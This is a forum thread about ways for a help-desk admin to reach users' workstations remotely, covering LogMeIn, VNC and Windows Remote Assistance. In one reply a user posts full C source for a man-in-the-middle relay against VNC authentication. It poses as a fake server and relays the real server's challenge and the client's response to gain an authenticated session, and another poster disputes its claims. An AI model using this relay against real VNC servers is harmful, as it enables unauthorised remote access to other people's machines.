Jump to content

Remote Assistant Question...

atari37

By atari37
in Windows 2000/2003/NT4

 Share

Recommended Posts

atari37

atari37

Posted
Posted

Let's say a user calls my desk and reports an error or problem that needs my attention. At the present time, I walk over or drive over to that building to take care of the issue.

I'm looking for a better solution. I know I can use Remote Desktop to log into the workstations but that logs the user off their machine. I've also head of remote assistant but that requires a .NET account which I don't want to use. So what's the best solution for me? What will allow me to log into any of the workstations on my DC without logging off the current user? I also want the current user to see what I'm doing remotely on their screens.

Thanks

Link to comment
Share on other sites

atari37

atari37

Posted
  • Author
Posted
You might want to take a look here. Log Me In. We use it all the time at the company I work for and it is very good piece of software.

Funny, I was just looking at that.

That let's you login remotely without logging the current user off? Keystrokes can be seen on the users screen?

Link to comment
Share on other sites
atari37

atari37

Posted
  • Author
Posted
I have offices all over the US and I use VNC, RealVNC specifically as much as possible. Their site lists a few versions but I use the free version. Only problem I've run into is service mode doesn't work on Vista, at least not yet.

Do I need to install VNC Server and Viewer on the client machines?

Link to comment
Share on other sites
mad_raven

mad_raven

Posted
Posted
You might want to take a look here. Log Me In. We use it all the time at the company I work for and it is very good piece of software.

Funny, I was just looking at that.

That let's you login remotely without logging the current user off? Keystrokes can be seen on the users screen?

Yep you can see everything they do and they can see everything that you are doing on their machine. The rescue product does require the user to initiate the session so you can't login at any time to their machine, and it will work without opening any firewall ports. (although some software firewalls do ask if you want to block it or not).

Log Me In do do a product similar to VNC but I haven't used it so I can't comment on how it works.

Link to comment
Share on other sites
cluberti

cluberti

Posted
Posted
Let's say a user calls my desk and reports an error or problem that needs my attention. At the present time, I walk over or drive over to that building to take care of the issue.

I'm looking for a better solution. I know I can use Remote Desktop to log into the workstations but that logs the user off their machine. I've also head of remote assistant but that requires a .NET account which I don't want to use. So what's the best solution for me? What will allow me to log into any of the workstations on my DC without logging off the current user? I also want the current user to see what I'm doing remotely on their screens.

Thanks

If you're on a domain, you don't need a .net account, and Remote Assistance can be configured in Group Policy as well. RA is completely domain-aware.

Link to comment
Share on other sites
Mijzelf

Mijzelf

Posted
Posted
VNC has a massive security flaw

Link?

and is very vulnerable to man in the middle attacks

How? When the client connects to the server on a known IP address, where should the man in the middle hide?

Link to comment
Share on other sites
eyeball

eyeball

Posted
Posted (edited)

this code may help you :whistle:

it forces the client to redirect from the server to you and thus you gain the password of the vnc server

#include <netinet/in.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#define VNCPORT 5900
#define VNCSERVER "x.x.x.x"
#define QUEUE 8
#define BUFSIZ 512

typedef char rfbProtocolVersionMsg[13];
#define sz_rfbProtocolVersionMsg 12

int main (int argc, char **argv) {

int sockfd, clientfd, vncfd;
int nbytes = 0;
struct sockaddr_in server, client, vnc;
int len = sizeof (client);
char buf [BUFSIZ];

if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
perror ("socket");
exit (-1);
}

bzero (&server, sizeof (server) );
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (INADDR_ANY);
server.sin_port = htons (VNCPORT);

/* this is the fake VNC server */
if (bind (sockfd, (struct sockaddr *) &server,
sizeof (server) ) == -1) {
perror ("bind");
exit (-1);
}

listen (sockfd, QUEUE);

if ( (clientfd = accept (sockfd,
(struct sockaddr *) &client, &len) ) == -1) {
perror ("accept");
exit (-1);
}

strcpy (buf, "RFB 003.003\n");

/* we must send VNC version number (from protocol) */
if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}

/* we also must read VNC version number (from protocol) */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}

buf [nbytes] = 0;
printf ("version -> %s\n", buf);

buf [0] = 0x00;
buf [1] = 0x00;
buf [2] = 0x00;
buf [3] = 0x02;

/* we send the authentication method code to the client */
if (write (clientfd, buf, 4) < 4) {
perror ("write");
exit (-1);
}

if ( (vncfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
perror ("socket");
exit (-1);
}

bzero (&vnc, sizeof (vnc) );
vnc.sin_family = AF_INET;
vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
vnc.sin_port = htons (VNCPORT);

/* we connect to the real VNC server */
if (connect (vncfd, (struct sockaddr *) &vnc,
sizeof (vnc) ) == -1) {
perror ("connect");
exit (-1);
}

/* again, we read version number from the VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}

strcpy (buf, "RFB 003.003\n");

/* and we send ours */
if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}

/* we now read authenticarion method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}

/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}

/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}

/* we have the encrypted password from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}

/* we send the encrypted password to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}

/* we read the result from the authentication process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}

/* at this point we should be authenticated */
/* place whatever code you want here */

close (clientfd);
close (sockfd);
close (vncfd);

return 0;
}

is that convincing enough for you?

EDIT - checkout insecure.org, its great for stuff like that :)

Edited by eyeball
Link to comment
Share on other sites
nmX.Memnoch

nmX.Memnoch

Posted
Posted

Use Remote Assistance. Like cluberti said, it's completely domain aware and can (and should) be configured through Group Policy. You don't have to have the client intiate it either. Make a new shortcut called "Offer Remote Assistance" with the following target (it's all one line):

hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/Remote%20Assistance/Escalation/Unsolicited/unsolicitedrcui.htm

That goes through the "unsoliciated" Remote Assistance dialogs in Help and Support. Basically you run the shortcut, put in the computer name or IP address and hit Connect. It'll show you who is logged in on the destination computer and ask if you want to connect to their session. On their end they'll receive a notification and have to click Yes. From there it's just like any other Remote Assistance connection.

VNC is not only a security vulnerability but it's slow compared to Remote Assitance and Remote Desktop.

Link to comment
Share on other sites
eyeball

eyeball

Posted
Posted
Use Remote Assistance. Like cluberti said, it's completely domain aware and can (and should) be configured through Group Policy. You don't have to have the client intiate it either. Make a new shortcut called "Offer Remote Assistance" with the following target (it's all one line):

hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/Remote%20Assistance/Escalation/Unsolicited/unsolicitedrcui.htm

That goes through the "unsoliciated" Remote Assistance dialogs in Help and Support. Basically you run the shortcut, put in the computer name or IP address and hit Connect. It'll show you who is logged in on the destination computer and ask if you want to connect to their session. On their end they'll receive a notification and have to click Yes. From there it's just like any other Remote Assistance connection.

VNC is not only a security vulnerability but it's slow compared to Remote Assitance and Remote Desktop.

i second both of these statements, vnc is rather slow isnt it, laggy enough to make you frustrated at times lol

Link to comment
Share on other sites
Mijzelf

Mijzelf

Posted
Posted
this code may help you

it forces the client to redirect from the server to you and thus you gain the password of the vnc server

<snip>

is that convincing enough for you?

No. All I see is code which can be used by the man-in-the-middle to get an authenticated connection to the server, *IF* the client is dull enough to connect to the man-in-the-middle, instead of to the server. How would you force this? Hijacking a router, cutting a cable or social engineering?

It doesn't even reveal the password, since it's encrypted by a onetime key, which encryption AFAIK is irreversable.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...